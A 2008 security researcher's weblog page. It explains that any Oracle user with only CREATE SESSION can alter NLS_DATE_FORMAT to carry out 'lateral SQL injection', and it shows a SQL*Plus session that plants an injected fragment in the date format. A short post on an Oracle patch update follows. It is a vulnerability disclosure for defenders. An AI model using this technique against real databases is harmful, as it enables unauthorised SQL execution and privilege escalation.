David Litchfield's Weblog

Home
Archives
NGSSoftware
DatabaseSecurity.com


Greymatter Forums

July 2008
SMTWTFS
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

Valid XHTML 1.0!

Powered By Greymatter

RSS 1.0 FEED
RSS 2.0 FEED
Atom 0.3 FEED
Powered by gm-rss 2.0.1
Friday, July 18th

Lateral SQL Injection Revisited - No Special Privs Required


At the end of April 2008 I published a paper about a new class of flaw in Oracle entitled "Lateral SQL Injection".

The paper can be found here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

Essentially the paper details a way in which the attacker can manipulate the environment to trick an Oracle database into using arbitrary SQL in DATE functions and data.

A number of people at the time dismissed it as irrelevant because the attacker required the ALTER SESSIOn privilege. Well, as it turns out, you don't need the ALTER SESSION privilege at all. Here's why: there are certain ALTER SESSION statements that can be executed even though the user doesn't have the ALTER SESSION privilege. The statements that can be executed without the privilege include those that relate to National Language Support. Thus a user without ALTER SESSION privileges can change the date format and so employ a lateral SQL injection attack. The script below shows this in action. We connect to a fully patched 11g server and confirm we only have CREATE SESSION privileges - i.e. the minimum we need to connect to the server - everyone gets this privilege. We then issue an ALTER SESSION statement to try set SQL_TRACE to true. As expected this fails with an insufficient privileges error. But then we issues an ALTER SESSION to set the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function to confirm it took.


C:\>sqlplus /nolog

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

SQL> connect testuser1/testuser1
Connected.
SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION

SQL> alter session set sql_trace = true;
alter session set sql_trace = true
*
ERROR at line 1:
ORA-01031: insufficient privileges


SQL> alter session set nls_date_format='"'' and myfunc()=1--"';

Session altered.

SQL> select sysdate from dual;

SYSDATE
------------------
' and myfunc()=1--

SQL>

Thus we can see that no special privileges are required to effect a lateral SQL injection attack.
David on 07.18.08 @ 07:05 AM GMT [link]


Tuesday, July 15th

Oracle have released a Critical Patch Update


Oracle has released a critical patch update. This update fixes a number of serious issues including a Oracle Application Server PLSQL injection flaw I found in October 2007.

This flaw will serve as an excellent example for my upcoming Hacking Oracle PLSQL training course at Blackhat in Vegas this August.
David on 07.15.08 @ 01:38 PM GMT [link]